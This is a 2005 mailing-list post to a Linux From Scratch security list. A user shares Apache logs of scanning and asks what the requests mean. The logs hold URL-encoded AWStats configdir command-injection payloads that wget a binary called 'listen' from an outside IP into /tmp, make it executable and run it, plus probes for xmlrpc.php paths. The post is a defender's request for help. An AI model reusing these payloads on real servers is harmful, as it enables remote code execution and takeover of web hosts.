Apache scanning for the xmlrpc.php and more

Ɓukasz Hejnak <[email protected]> Tue, 22 Nov 2005 23:54:59 +0100
Newsgroups gmane.linux.lfs.security
Message-ID <[email protected]>
Hi
Recently I've been getting a bigger then normal amount of port 80=20
designated attacks. What's wondering is that most of these look much=20
alike, like it was some kind of script/program for scanning. Anybody=20
else is getting those? what is it?
Below are the logs from apache:

81.208.19.149 - - [22/Nov/2005:22:10:31 +0100] "GET=20
/awstats/awstats.pl?configdir=3D|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%=
2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e=
102%2e212%2e115;echo%20YYY;echo|=20
  HTTP/1.1" 404 317
81.208.19.149 - - [22/Nov/2005:22:10:32 +0100] "GET=20
/cgi-bin/awstats.pl?configdir=3D|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%=
2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e=
102%2e212%2e115;echo%20YYY;echo|=20
  HTTP/1.1" 404 317
81.208.19.149 - - [22/Nov/2005:22:10:36 +0100] "GET=20
/cgi-bin/awstats/awstats.pl?configdir=3D|echo;echo%20YYY;cd%20%2ftmp%3bwg=
et%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%=
20216%2e102%2e212%2e115;echo%20YYY;echo|=20
  HTTP/1.1" 404 325
81.208.19.149 - - [22/Nov/2005:22:10:37 +0100] "POST /xmlrpc.php=20
HTTP/1.1" 404 309
81.208.19.149 - - [22/Nov/2005:22:10:39 +0100] "POST /blog/xmlrpc.php=20
HTTP/1.1" 404 314
81.208.19.149 - - [22/Nov/2005:22:10:40 +0100] "POST=20
/blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 321
81.208.19.149 - - [22/Nov/2005:22:10:44 +0100] "POST=20
/blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 322
81.208.19.149 - - [22/Nov/2005:22:10:48 +0100] "POST /drupal/xmlrpc.php=20
HTTP/1.1" 404 316
81.208.19.149 - - [22/Nov/2005:22:10:50 +0100] "POST=20
/phpgroupware/xmlrpc.php HTTP/1.1" 404 322
81.208.19.149 - - [22/Nov/2005:22:10:54 +0100] "POST=20
/wordpress/xmlrpc.php HTTP/1.1" 404 319
81.208.19.149 - - [22/Nov/2005:22:10:56 +0100] "POST /xmlrpc.php=20
HTTP/1.1" 404 309
81.208.19.149 - - [22/Nov/2005:22:10:57 +0100] "POST /xmlrpc/xmlrpc.php=20
HTTP/1.1" 404 316


What exactly is this for? looking for the xmlrpc.php, is it some file=20
with a known exploit to it or such?

and furthermore, this here:
/awstats/awstats.pl?configdir=3D|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%=
2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e=
102%2e212%2e115;echo%20YYY;echo|=20

/cgi-bin/awstats.pl?configdir=3D|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%=
2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e=
102%2e212%2e115;echo%20YYY;echo|=20
=20
/cgi-bin/awstats/awstats.pl?configdir=3D|echo;echo%20YYY;cd%20%2ftmp%3bwg=
et%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%=
20216%2e102%2e212%2e115;echo%20YYY;echo|=20


this is as far as I can understand, a vulnerability that allows one to=20
execute shell commands with the privileges of the apache user, nice..

--
Best wishes
=A3ukasz Hejnak
--=20
http://linuxfromscratch.org/mailman/listinfo/lfs-security
FAQ: http://www.linuxfromscratch.org/faq/
Unsubscribe: See the above information page